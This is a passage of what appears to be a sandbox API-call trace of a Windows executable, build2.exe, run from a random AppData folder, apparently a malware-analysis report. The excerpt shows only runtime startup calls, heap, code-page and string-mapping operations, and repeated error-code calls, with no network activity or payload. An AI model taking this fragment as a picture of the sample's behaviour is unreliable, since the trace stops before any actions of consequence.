(lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0110.969] GetProcAddress (hModule=0x752b0000, lpProcName="DecodePointer") returned 0x76f39d35 [0110.970] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0110.970] GetProcAddress (hModule=0x752b0000, lpProcName="EncodePointer") returned 0x76f40fcb [0110.970] GetProcAddress (hModule=0x752b0000, lpProcName="DecodePointer") returned 0x76f39d35 [0110.972] GetCurrentThreadId () returned 0xf14 [0110.972] GetStartupInfoA (in: lpStartupInfo=0x18fe8c | out: lpStartupInfo=0x18fe8c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0110.972] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x824) returned 0x210a10 [0110.972] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0110.973] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0110.973] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0110.973] SetHandleCount (uNumber=0x20) returned 0x20 [0110.973] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe\" " [0110.973] GetEnvironmentStringsW () returned 0x8f1fb0* [0110.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1415, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1415 [0110.973] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x5ab) returned 0x211240 [0110.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1415, lpMultiByteStr=0x211260, cbMultiByte=1415, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1415 [0110.973] FreeEnvironmentStringsW (penv=0x8f1fb0) returned 1 [0110.973] GetLastError () returned 0x0 [0110.973] SetLastError (dwErrCode=0x0) [0110.973] GetLastError () returned 0x0 [0110.973] SetLastError (dwErrCode=0x0) [0110.973] GetLastError () returned 0x0 [0110.973] SetLastError (dwErrCode=0x0) [0110.973] GetACP () returned 0x4e4 [0110.973] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x244) returned 0x2117f8 [0110.974] GetLastError () returned 0x0 [0110.974] SetLastError (dwErrCode=0x0) [0110.974] IsValidCodePage (CodePage=0x4e4) returned 1 [0110.974] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe54 | out: lpCPInfo=0x18fe54) returned 1 [0110.974] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f918 | out: lpCPInfo=0x18f918) returned 1 [0110.974] GetLastError () returned 0x0 [0110.974] SetLastError (dwErrCode=0x0) [0110.974] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8b0 | out: lpCharType=0x18f8b0) returned 1 [0110.974] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f930, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0110.974] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x22c) returned 0x211a48 [0110.974] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f930, cbMultiByte=256, lpWideCharStr=0x211a70, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0110.974] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpCharType=0x18fc38 | out: lpCharType=0x18fc38) returned 1 [0110.974] HeapValidate (hHeap=0x210000, dwFlags=0x0, lpMem=0x211a48) returned 1 [0110.975] HeapFree (in: hHeap=0x210000, dwFlags=0x0, lpMem=0x211a48 | out: hHeap=0x210000) returned 1 [0110.975] GetLastError () returned 0x0 [0110.975] SetLastError (dwErrCode=0x0) [0110.975] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0110.975] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f930, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0110.975] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x22c) returned 0x211a48 [0110.975] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f930, cbMultiByte=256, lpWideCharStr=0x211a70, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0110.975] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0110.976] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x22c) returned 0x211c80 [0110.976] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x211ca8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0110.976] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchWideChar=256, lpMultiByteStr=0x18fb38, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0110.976] HeapValidate (hHeap=0x210000, dwFlags=0x0, lpMem=0x211c80) returned 1 [0110.976] HeapFree (in: hHeap=0x210000, dwFlags=0x0, lpMem=0x211c80 | out: hHeap=0x210000) returned 1 [0110.976] HeapValidate (hHeap=0x210000, dwFlags=0x0, lpMem=0x211a48) returned 1 [0110.977] HeapFree (in: hHeap=0x210000, dwFlags=0x0, lpMem=0x211a48 | out: hHeap=0x210000) returned 1 [0110.977] GetLastError () returned 0x0 [0110.977] SetLastError (dwErrCode=0x0) [0110.977] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f930, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0110.977] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x22c) returned 0x211a48 [0110.977] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f930, cbMultiByte=256, lpWideCharStr=0x211a70, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0110.977] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0110.977] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x22c) returned 0x211c80 [0110.977] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x211ca8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽") returned 256 [0110.977] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽", cchWideChar=256, lpMultiByteStr=0x18fa38, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0110.977] HeapValidate (hHeap=0x210000, dwFlags=0x0, lpMem=0x211c80) returned 1 [0110.977] HeapFree (in: hHeap=0x210000, dwFlags=0x0, lpMem=0x211c80 | out: hHeap=0x210000) returned 1 [0110.977] HeapValidate (hHeap=0x210000, dwFlags=0x0, lpMem=0x211a48) returned 1 [0110.978] HeapFree (in: hHeap=0x210000, dwFlags=0x0, lpMem=0x211a48 | out: hHeap=0x210000) returned 1 [0110.978] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x464f40, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe")) returned 0x50 [0110.978] GetLastError () returned 0x0 [0110.978] SetLastError (dwErrCode=0x0) [0110.978] GetLastError () returned 0x0 [0110.978] SetLastError (dwErrCode=0x0) [0110.978] GetLastError () returned 0x0 [0110.978] SetLastError (dwErrCode=0x0) [0110.978] GetLastError () returned 0x0 [0110.978] SetLastError (dwErrCode=0x0) [0110.978] GetLastError () returned 0x0 [0110.979] SetLastError (dwErrCode=0x0) [0110.979] GetLastError () returned 0x0 [0110.979] SetLastError (dwErrCode=0x0) [0110.979] GetLastError () returned 0x0 [0110.979] SetLastError (dwErrCode=0x0) [0110.979] GetLastError () returned 0x0 [0110.979] SetLastError (dwErrCode=0x0) [0110.979] GetLastError () returned 0x0 [0110.979] SetLastError (dwErrCode=0x0) [0110.979] GetLastError () returned 0x0 [0110.979] SetLastError (dwErrCode=0x0) [0110.979] GetLastError () returned 0x0 [0110.981] SetLastError (dwErrCode=0x0) [0110.981] GetLastError () returned 0x0 [0110.981] SetLastError (dwErrCode=0x0) [0110.981] GetLastError () returned 0x0 [0110.981] SetLastError (dwErrCode=0x0) [0110.981] GetLastError () returned 0x0 [0110.981] SetLastError (dwErrCode=0x0) [0110.981] GetLastError () returned 0x0 [0110.981] SetLastError (dwErrCode=0x0) [0110.981] GetLastError () returned 0x0 [0110.982] SetLastError (dwErrCode=0x0) [0110.982] GetLastError () returned 0x0 [0110.982] SetLastError (dwErrCode=0x0) [0110.982] GetLastError () returned 0x0 [0110.982] SetLastError (dwErrCode=0x0) [0110.982] GetLastError () returned 0x0 [0110.982] SetLastError (dwErrCode=0x0) [0110.982] GetLastError () returned 0x0 [0110.982] SetLastError (dwErrCode=0x0) [0110.982] GetLastError () returned 0x0 [0110.982] SetLastError (dwErrCode=0x0) [0110.982] GetLastError () returned 0x0 [0110.982] SetLastError (dwErrCode=0x0) [0110.982] GetLastError () returned 0x0 [0110.982] SetLastError (dwErrCode=0x0) [0110.982] GetLastError () returned 0x0 [0110.982] SetLastError (dwErrCode=0x0) [0110.983] GetLastError () returned 0x0 [0110.983] SetLastError (dwErrCode=0x0) [0110.983] GetLastError () returned 0x0 [0110.983] SetLastError (dwErrCode=0x0) [0110.983] GetLastError () returned 0x0 [0110.983] SetLastError (dwErrCode=0x0) [0110.983] GetLastError () returned 0x0 [0110.983] SetLastError (dwErrCode=0x0) [0110.983] GetLastError () returned 0x0 [0110.983] SetLastError (dwErrCode=0x0) [0110.983] GetLastError () returned 0x0 [0110.983] SetLastError (dwErrCode=0x0) [0110.983] GetLastError () returned 0x0 [0110.983] SetLastError (dwErrCode=0x0) [0110.983] GetLastError () returned 0x0 [0110.983] SetLastError (dwErrCode=0x0) [0110.983] GetLastError () returned 0x0 [0110.983] SetLastError (dwErrCode=0x0) [0110.983] GetLastError () returned 0x0 [0110.984] SetLastError (dwErrCode=0x0) [0110.984] GetLastError () returned 0x0 [0110.984] SetLastError (dwErrCode=0x0) [0110.984] GetLastError () returned 0x0 [0110.984] SetLastError (dwErrCode=0x0) [0110.984] GetLastError () returned 0x0 [0110.984] SetLastError (dwErrCode=0x0) [0110.984] GetLastError () returned 0x0 [0110.984] SetLastError (dwErrCode=0x0) [0110.984] GetLastError () returned 0x0 [0110.984] SetLastError (dwErrCode=0x0) [0110.984] GetLastError () returned 0x0 [0110.984] SetLastError (dwErrCode=0x0) [0110.984] GetLastError () returned 0x0 [0110.984] SetLastError (dwErrCode=0x0) [0110.984] GetLastError () returned 0x0 [0110.984] SetLastError (dwErrCode=0x0) [0110.984] GetLastError () returned 0x0 [0110.985] SetLastError (dwErrCode=0x0) [0110.985] GetLastError () returned 0x0 [0110.985] SetLastError (dwErrCode=0x0) [0110.985] GetLastError () returned 0x0 [0110.985] SetLastError (dwErrCode=0x0) [0110.985] GetLastError () returned 0x0 [0110.985] SetLastError (dwErrCode=0x0) [0110.985] GetLastError () returned 0x0 [0110.985] SetLastError (dwErrCode=0x0) [0110.985] GetLastError () returned 0x0 [0110.985] SetLastError (dwErrCode=0x0) [0110.985] GetLastError () returned 0x0 [0110.985] SetLastError (dwErrCode=0x0) [0110.985] GetLastError () returned 0x0 [0110.985] SetLastError (dwErrCode=0x0) [0110.985] GetLastError () returned 0x0 [0110.986] SetLastError (dwErrCode=0x0) [0110.986] GetLastError () returned 0x0 [0110.986] SetLastError (dwErrCode=0x0) [0110.986] GetLastError () returned 0x0 [0110.986] SetLastError (dwErrCode=0x0) [0110.986] GetLastError () returned 0x0 [0110.986] SetLastError (dwErrCode=0x0) [0110.986] GetLastError () returned 0x0 [0110.986] SetLastError (dwErrCode=0x0) [0110.986] GetLastError () returned 0x0 [0110.986] SetLastError (dwErrCode=0x0) [0110.986] GetLastError () returned 0x0 [0110.986] SetLastError (dwErrCode=0x0) [0110.986] GetLastError () returned 0x0 [0110.986] SetLastError (dwErrCode=0x0) [0110.986] GetLastError () returned 0x0 [0110.986] SetLastError (dwErrCode=0x0) [0110.986] GetLastError () returned 0x0 [0110.987] SetLastError (dwErrCode=0x0) [0110.987] GetLastError () returned 0x0 [0110.987] SetLastError (dwErrCode=0x0) [0110.987] GetLastError () returned 0x0 [0110.987] SetLastError (dwErrCode=0x0) [0110.987] GetLastError () returned 0x0 [0110.987] SetLastError (dwErrCode=0x0) [0110.987] GetLastError () returned 0x0 [0110.987] SetLastError (dwErrCode=0x0) [0110.987] GetLastError () returned 0x0 [0110.987] SetLastError (dwErrCode=0x0) [0110.987] GetLastError () returned 0x0 [0110.987] SetLastError (dwErrCode=0x0) [0110.987] GetLastError () returned 0x0 [0110.987] SetLastError (dwErrCode=0x0) [0110.987] GetLastError () returned 0x0 [0110.987] SetLastError (dwErrCode=0x0) [0110.988] GetLastError () returned 0x0 [0110.988] SetLastError (dwErrCode=0x0) [0110.988] GetLastError () returned 0x0 [0110.988] SetLastError (dwErrCode=0x0) [0110.988] GetLastError () returned 0x0 [0110.988] SetLastError (dwErrCode=0x0) [0110.988] GetLastError () returned 0x0 [0110.988] SetLastError (dwErrCode=0x0) [0110.988] GetLastError () 